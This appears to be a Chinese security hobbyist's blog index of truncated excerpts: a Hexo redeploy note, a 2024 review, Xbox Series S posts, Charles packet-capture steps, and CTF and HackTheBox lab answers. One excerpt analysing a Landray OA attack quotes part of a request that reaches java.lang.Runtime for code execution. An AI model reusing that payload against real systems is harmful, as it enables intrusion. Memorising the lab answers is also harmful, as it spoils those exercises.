关于重新部署博客的一点笔记🤦🏻‍♂️  更换电脑后，之前配置好的环境全部重新构建，当时什么都备份了，唯独忘了将博客进行备份，加上长时间不操作Github很多步骤都遗忘，跟着DeepSeek越弄越麻烦，后来想起来还有一个Hexo的官方文档，于是乎直接删掉原来的仓库，重新建立并跟着官方文档一步步操作，这才将博客重新运作起来。所以这篇文章纯属是为了防止遗忘而记录的🤦🏻‍♂️

​   回顾整个2024年，有很多想说的东西，但是一时间真的不知道该从何说起，所以就想到哪说哪吧。工作上面，由于2023年本科毕业后在成都地铁站务员干的很无趣，所以干了3个月就跑路了，虽然是和成都地铁签的是正式合同，但是这工作对我来说真的很难受，不是说眼高手低那种，是属于精神上的难受。后来跑路后想了想自己出路就半路出家并借着大学时候对一些东西的研究和兴趣，一门心思扎进网安这个行

蓝凌OA—恶意代码分析一、大致经过 进行护网前期资产排查的时候，在客户这边的登录系统上面发现蓝凌OA的一个漏洞，同时分析攻击数据包发现恶意代码/data/sys-common/datajson.js?s_bean=sysFormulaSimulateByJS&script=function test(){return java.lang.Runtime};r=test(

APP抓包一、Charles抓包步骤 环境：Charles 4.6.3 逍遥模拟器 步骤： Charles中下载证书:Help–>SSL Proxying—>Save Charles Root Certificate… 将证书保存到本地，然后将证书放入到与模拟器共享的文件夹下(路径无所谓，只要是与模拟器共享的文件夹就行) 在模拟器的找到设置->安全->从SDK安装-&

Training-WWW-Robots题目说明：访问链接后，将其翻译过来如图所示，说明这个是有关爬虫robots.txt文件的内容。 所以，我的思路是先尝试访问robots.txt看看能不能找到什么信息，在网址后面拼上robots.txt得到如图内容： 根据文件信息可以看到禁止了所有robots引擎访问f10g.php这个文件，但是允许Yandex搜索引擎访问除过f10g.php文件的所有内容

之前一直看网上说XSS这机子怎么怎么🐮，说实话在目下这个主机版本里面XSS的性能真不怎么样，就同家的XSX的性能都比XSS强，所以XSS就不能单拉性能而论。个人认为XSS存在的意义就是为了降低游玩3A游戏的入门门槛，让那些喜欢打游戏但是资金又不充足的人群也能够的到。所以对于御三家都有的玩家来说XSS在这部分人眼中确实是电子垃圾，但是对于穷游党来说XSS+XGP是当下最理想的选择，当初XSS买回来

最近入手了一台XSS，人生的第一台主机，不得不说是真滴香🐮🐮🐮🐮🐮🐮。记得小学二三年级那会儿，真的很羡慕小伙伴手上的PS游戏机，当时玩的还是宝可梦和罪恶都市还有一个三国的什么游戏，所以那时候有事没事都去小伙伴那蹭游戏。后来应该是上六年级吧家里装了电脑，当时第一件事就是下穿越火线，那时候这游戏可不像现在这么😫这游戏在我那个时候真的受众程度不亚于LOL，也就是从这个时候开始慢慢接触“3A

Three一、问题123456789101112131415161718How many TCP ports are open? 2What is the domain of the email address provided in the "Contact" section of the website? thetoppers.htbIn the absence of a

ArcheType一、问题 Which TCP port is hosting a database server?(哪个TCP端口托管数据库服务器？) 1433 What is the name of the non-Administrative share available over SMB?(SMB上可用的非管理共享的名称是什么？) backups What is the pass

HackBox—起点(二) What does the 3-letter acronym FTP stand for?(3 个字母的首字母缩略词 FTP 代表什么？) File Transfer Protocol(文件传输协议) Which port does the FTP service listen on usually?(FTP服务通常监听哪个端口？) 21 What acro